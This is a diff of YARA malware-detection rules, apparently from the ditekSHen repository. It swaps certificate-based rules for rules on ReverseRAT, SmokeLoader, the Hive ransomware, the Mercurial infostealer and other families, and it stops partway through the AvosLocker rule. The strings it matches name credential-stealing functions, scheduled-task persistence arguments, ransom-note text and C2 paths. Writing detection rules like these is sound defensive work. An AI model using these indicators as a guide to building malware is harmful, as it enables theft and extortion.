-rule DITEKSHEN_INDICATOR_KB_CERT_40F5660A90301E7A8A8C3B42 : FILE
+rule DITEKSHEN_MALWARE_Win_Reverserat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ReverseRAT"
 		author = "ditekSHen"
-		id = "c3c8fbdf-49ca-5898-b267-74256154973a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8176-L8189"
+		id = "df13fc6c-025a-54db-809d-4f3c27b8aa7a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6495-L6514"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed584aa8ad833066ed9f7ddbf98dc75efe88e0b7e69f564a90eade63dc2aee2d"
+		logic_hash = "87ab00a5588bfce04ec47a07b184fffe359e472ac8bf561b02a8b070edf2e014"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2ac041e3c46c82fbcee34617ee31336e845e18efe6b9ae5c8811351db5b56da2"
-		reason = "Cobalt Strike"
-		importance = 20
+
+	strings:
+		$pdb1 = "\\ReverseRat.pdb" ascii nocase
+		$pdb2 = "\\ReverseRat\\obj\\" ascii nocase
+		$s1 = "processCmd" fullword ascii
+		$s2 = "CmdOutputDataHandler" fullword ascii
+		$s3 = "sendingProcess" fullword ascii
+		$s4 = "SetStartup" fullword ascii
+		$s5 = "RunServer" fullword ascii
+		$s6 = "_OutputDataReceived" ascii
+		$s7 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00
+                00 03 0a 00 00 13 74 00 65 00 72 00 6d 00
+                69 00 6e 00 61 00 74 00 65 00 00 09 65 00
+                78 00 69 00 74 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Dfc1F1B0F205Cc17Ed7D216Bb991F859 : FILE
+rule DITEKSHEN_MALWARE_Win_Smokeloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SmokeLoader variants"
 		author = "ditekSHen"
-		id = "93d5fd87-af92-5449-9d02-4666afa38fff"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8191-L8204"
+		id = "e8f28f89-3a79-5d78-8c0a-bad16a57df84"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6516-L6539"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24783267ab27f8102f724810322a7fbb010b7a2abf59ad206b96a3eb75968907"
+		logic_hash = "65c56ed11a3cb4e4bcf8fd2a6be097545cb96e84ba4c4202969d1d163a2a36ed"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b577362c1abcfb7d163b8702f23a6a3643c72ea0a3c8cf262092903a3110fa04"
-		reason = "PrivateLoader"
-		importance = 20
+
+	strings:
+		$x1 = "G2A/CLP/05/RYS" fullword wide
+		$x2 = "0N1Y/53R10U5/BU51N355" fullword wide
+		$x3 = "CH4PG3PB-6HT2VI9C-O2NL2NO5-QP1BW0EG" fullword wide
+		$s1 = "Azure-Update-Task" fullword wide
+		$s2 = "C:\\Windows\\System32\\schtasks.exe" fullword wide
+		$s3 = "/C /create /F /sc minute /mo 1 /tn \"" fullword wide
+		$s4 = "\\Microsoft\\Network" fullword wide
+		$s5 = "\\Microsoft\\TelemetryServices" fullword wide
+		$s6 = "\" /tr \"" fullword wide
+		$e1 = "\\sqlcmd.exe" fullword wide
+		$e2 = "\\sihost.exe" fullword wide
+		$e3 = "\\fodhelper.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Astori LLC" and pe.signatures [ i ] . serial == "df:c1:f1:b0:f2:05:cc:17:ed:7d:21:6b:b9:91:f8:59" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $e* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E573D9C8B403C41Bd59Ffa0A8Efd4168 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown loader / injector"
 		author = "ditekSHen"
-		id = "683ea9a6-2002-5c48-8512-51f65e70dd2c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8206-L8219"
+		id = "2d0df2d8-5b1c-5408-b8c7-8ca14d57da0f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6541-L6551"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ec53ab007d8be2f3cad45e787e724c5af0dd3f18c2b66a179b822bdeeb0d1560"
+		logic_hash = "10092e7916775fe0a39baa5714fdda89f443ceabdcc610cc1fcd5a0fb0e68d0c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "a9ab2be0ea677c6c6ed67b23cfee0fa44bfb346a4bb720f10a3f02a78b8f5c82"
-		reason = "Dridex"
-		importance = 20
+
+	strings:
+		$x1 = "LOADER ERROR" fullword ascii
+		$s1 = "_ZN6curlpp10OptionBaseC2E10CURLoption" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERONIKA 2\" OOO\"" and pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2F38De4Ced0B070973B9E9B9B1Dcfa7F : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "39910712-4a11-5722-9b48-c069bfcefb14"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8221-L8234"
+		id = "1878a1b5-4e97-5575-802e-573caded2b3a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6553-L6571"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84c3d89e8393bcaddea53326730d795f482ec65c574fde5c1c81f395178b591a"
+		logic_hash = "83760aef667819923a2ac67c006e03bb6d4260b7a4aedd691dd5b145fb50d5c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "71382f6c6e48df51f15606380cd6948bf37f044d18566ebc2d262fc87e70b9b1"
-		reason = "Gh0stRAT"
-		importance = 20
+
+	strings:
+		$s1 = "%s/%s (Windows NT %lu.%lu" fullword ascii
+		$s2 = "\\Microsoft\\Libs\\WR64.sys" wide
+		$s3 = "\\\\.\\WinRing0_" wide
+		$s4 = "pool_wallet" ascii
+		$s5 = "cryptonight" ascii
+		$s6 = "mining.submit" ascii
+		$c1 = "stratum+ssl://" ascii
+		$c2 = "daemon+http://" ascii
+		$c3 = "stratum+tcp://" ascii
+		$c4 = "socks5://" ascii
+		$c5 = "losedaemon+https://" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fahad Malik" and pe.signatures [ i ] . serial == "2f:38:de:4c:ed:0b:07:09:73:b9:e9:b9:b1:dc:fa:7f" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $c* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_53E1F226Cb77574F8Fbeb5682Da091Bb : FILE
+rule DITEKSHEN_MALWARE_Win_Mercurial : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Mercurial infostealer"
 		author = "ditekSHen"
-		id = "6967042e-156b-541d-970c-491dece12f08"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8236-L8249"
+		id = "c262ada2-01ca-5fc1-adef-987908514019"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6573-L6593"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41f4902e9d02254efdfd19a73de16e1128b15d264c3ed128d5ec28bd92f2d8a4"
+		logic_hash = "400f8f717a4e07bf4de508c02bbcd9e82bf21f3df84c989fc622378f33e192f0"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "d247ec7e224a24683da3f138112ffc9607f83c917d6c45494dd744d732249260"
-		reason = "SystemBC"
-		importance = 20
+
+	strings:
+		$x1 = "mercurial grabber" wide nocase
+		$x2 = "\"text\":\"Mercurial Grabber |" wide
+		$x3 = "/nightfallgt/mercurial-grabber" wide
+		$s1 = "/LimerBoy/Adamantium-Thief/" ascii
+		$s2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" fullword wide
+		$s3 = "StealCookies" fullword ascii
+		$s4 = "StealPasswords" fullword ascii
+		$s5 = "DetectDebug" fullword ascii
+		$s6 = "CaptureScreen" fullword ascii
+		$s7 = "WebhookContent" fullword ascii
+		$s8 = /Grab(Token|Product|IP|Hardware)/ fullword ascii
+		$p1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword ascii wide
+		$p2 = "mfa\\.[\\w-]{84}" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 5 of ( $s* ) or ( all of ( $p* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Df2547B2Cab5689A81D61De80Eaaa3A2 : FILE
+rule DITEKSHEN_MALWARE_Win_Phonzy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects specific downloader agent"
 		author = "ditekSHen"
-		id = "4eba17f8-df3c-552d-90b5-faef7b860203"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8251-L8264"
+		id = "d35f41e4-4633-5482-9ae4-79354463f1b9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6595-L6608"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c32a6510bd3cfd09e84ccf36140eb405945059c981fb1888298501493f6ef68f"
+		logic_hash = "924e7674d76594314df1a32d38f19cee12a3ed49cdf5e153f98bb08a7634055c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4c6e21a6e96ea6fae6c142c2d1c919f590d9bf4e5c6b0f3ec7f9b0a38f3ce45d"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$ua1 = "User-Agent: Mozilla/5.0 (X11; Linux" wide
+		$s1 = "<meta name=\"keywords\" content=\"([\\w\\d ]*)\">" fullword wide
+		$s2 = "WebClient" fullword ascii
+		$s3 = "WriteAllText" fullword ascii
+		$s4 = "DownloadString" fullword ascii
+		$s5 = "WriteByte" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $ua* ) and ( $s1 ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_58Af00Ce542760Fc116B41Fa92E18589 : FILE
+rule DITEKSHEN_MALWARE_Win_Hive : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Hive ransomware"
 		author = "ditekSHen"
-		id = "62fd5f76-b890-5532-8c6f-e26942584899"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8266-L8279"
+		id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6610-L6647"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bcabd77b40ad9eae4c499c8cd4b3e3d39e5478fa590be536860375e890c1b62e"
+		logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "620dafea381ab657e0335321ca5a95077f33021927a32d5d62bff7e33704f4b7"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$url1 = "http://hivecust" ascii
+		$url2 = "http://hiveleakdb" ascii
+		$s1 = "encrypt_files.go" ascii
+		$s2 = "erase_key.go" ascii
+		$s3 = "kill_processes.go" ascii
+		$s4 = "remove_shadow_copies.go" ascii
+		$s5 = "stop_services_windows.go" ascii
+		$s6 = "remove_itself_windows.go" ascii
+		$x1 = "/encryptor/" ascii
+		$x2 = "HOW_TO_DECRYPT.txt" ascii
+		$x3 = "FilesEncrypted" fullword ascii
+		$x4 = "EncryptionStarted" fullword ascii
+		$x5 = "encryptFilesGroup" fullword ascii
+		$x6 = "Your data will be undecryptable" ascii
+		$x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii
+		$v1_1 = ".EncryptFiles." ascii
+		$v1_2 = ".EncryptFilename." ascii
+		$v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii
+		$v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii
+		$v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii
+		$v1_6 = "path/filepath.WalkDir" ascii
+		$v2_1 = "taskkill /f /im" ascii
+		$v2_2 = "schtasks /delete /tn" ascii
+		$v2_3 = "encfile.txt" ascii
+		$v2_4 = "README.html" ascii
+		$v2_5 = "total encrypt %v/%v" ascii
+		$v2_6 = "<b>ITSSHOWKEY</b>" ascii
+		$v2_7 = "Recovery your files." ascii
+		$v2_8 = "yaml:\"send_host\"" ascii
+		$v2_9 = "yaml:\"ignore_dir\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $url* ) or all of ( $s* ) or 4 of ( $x* ) or 5 of ( $v1* ) or 5 of ( $v2* ) or ( 4 of ( $v2* ) and #v2_1 > 10 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5B1F9Ec88D185631Ab032Dbfd5166C0D : FILE
+rule DITEKSHEN_MALWARE_Win_Spyro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Spyro / VoidCrypt / Limbozar ransomware"
 		author = "ditekSHen"
-		id = "233466e6-7b5f-50d7-967a-976b698e9194"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8281-L8294"
+		id = "8b3273c4-827e-50ce-983e-a5843f6b5a78"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6649-L6675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "05428b4e636a60fb409ead0f4aeb25ed08dae24d58c98a17bb77aa521706763a"
+		logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a46234c01e9f9904e500aefad4b5718d86aaec4e084b3d8ffbfe5724f8ddda45"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "Decrypt-info.txt" ascii wide
+		$s2 = "AbolHidden" ascii wide
+		$s3 = "C:\\ProgramData\\prvkey" ascii wide
+		$s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii
+		$s5 = "C:\\Users\\LEGION\\" ascii
+		$s6 = "C:\\ProgramData\\pkey.txt" fullword ascii
+		$s7 = ".Spyro" fullword ascii
+		$m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide
+		$m2 = "saving prvkey.txt.key file will cause" wide
+		$m3 = "in Case of no Answer:" wide
+		$m4 = "send us prvkey*.txt.key" wide
+		$m5 = "Somerhing went wrong while writing payload on disk" ascii
+		$m6 = "this country is forbidden.\"}" ascii
+		$c1 = "Voidcrypt/1.0" ascii
+		$c2 = "h1dd3n.cc" ascii
+		$c3 = "/voidcrypt/index.php" ascii
+		$c4 = "&user=" ascii
+		$c5 = "&disk-size=" ascii
+		$c6 = "unique-id=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $c* ) or 3 of ( $m* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : FILE
+rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DarkVNC"
 		author = "ditekSHen"
-		id = "452d9f84-a950-5503-adaf-fba95b45e798"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8296-L8309"
+		id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6677-L6696"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e439f15c3312ed3a1840967bb165300a491ffe3d1c9c629abcbebf3efd9b1f50"
+		logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c75025c80ab583a6ab87070e5b65c93cb59b48e0cbb5f99113e354a96f8fcd39"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide
+		$s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide
+		$s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
+		$s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii
+		$s5 = "PRM_STRG" fullword wide
+		$s6 = "bot_shell >" ascii
+		$s7 = "monitor_off / monitor_on" ascii
+		$s8 = "kbd_off / kbd_on" ascii
+		$s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii
+		$s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii
+		$s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii
+		$s12 = "#hvnc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : FILE
+rule DITEKSHEN_MALWARE_Win_RSJON : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RSJON / Ryzerlo / HiddenTear ransomware"
 		author = "ditekSHen"
-		id = "4d845dd7-4153-5082-bff0-d5f9a7b4b46e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8311-L8324"
+		id = "7cc3e863-b594-51a9-9d41-68021ce3b97c"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6698-L6727"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b53d30e5b6176eaae854bf4046339864225b417a147fe6f24fb51dfb0535911"
+		logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "1ef38b7c430c09062f4408c47da14d814be5e2e99749e65a2cf097f5610024fc"
-		reason = "Matanbuchus"
-		importance = 20
+
+	strings:
+		$pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii
+		$pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii
+		$pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii
+		$x1 = "READ_ME_PLZ.txt" wide
+		$x2 = "Files has been encrypted with rs-jon" wide
+		$x3 = ".rsjon" wide
+		$x4 = "bitcoins or kebab" wide
+		$x5 = /rs[-_]jon/ fullword ascii wide
+		$s1 = "SPIF_UPDATEINIFILE" fullword ascii
+		$s2 = "SPI_SETDESKWALLPAPER" fullword ascii
+		$s3 = "bytesToBeEncrypted" fullword ascii
+		$s4 = "SendPassword" fullword ascii
+		$s5 = "EncryptFile" ascii
+		$s6 = "fWinIni" fullword ascii
+		$s7 = "BTCAdress" fullword ascii
+		$s8 = "self_destruck" fullword ascii
+		$c1 = "?computer_name=" wide
+		$c2 = "&serialnumber=" wide
+		$c3 = "&password=" wide
+		$c4 = "&allow=ransom" wide
+		$c5 = "://darkjon.tk/" wide
+		$c6 = "/rnsm/write.php" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 6 of ( $s* ) or 4 of ( $c* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $pdb* ) and 1 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4728189Fa0F57793484Cdf764F5E283D : FILE
+rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects IndigoZebra BoxCaon"
 		author = "ditekSHen"
-		id = "02ec531e-aa1b-50b8-ae32-d885a0185cfe"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8326-L8339"
+		id = "becbde73-8b72-5e98-8684-87068ffff71b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6729-L6746"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "181971946ee4d643430b733ed57ccf07c940205853c9e5102b08b7bc509bcc63"
+		logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "89ff94ac1c577eced3afc9a81689d30ca238a8472ad0f025f6bed57a98dbb273"
-		reason = "Quakbot"
-		importance = 20
+
+	strings:
+		$s1 = "<RetCMD null>" fullword wide
+		$s2 = "<txt null>" fullword wide
+		$s3 = "C:\\Users\\Public\\%d\\" fullword wide
+		$s4 = "api.dropboxapi.com" fullword wide
+		$s5 = "/2/files/upload" fullword wide
+		$ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide
+		$ts2 = "%s /A /C \"%s\" > %s" ascii wide
+		$ts3 = "ersInfo" ascii wide
+		$ts4 = "%svmpid%d.log" ascii wide
+		$ts5 = "%scscode%d.log" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" )
+		( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of ( $ts* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : FILE
+rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Hunt for AvosLocker ransomware"
 		author = "ditekSHen"
-		id = "47ca5986-3de8-56f2-a15d-ef588d8a9e03"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
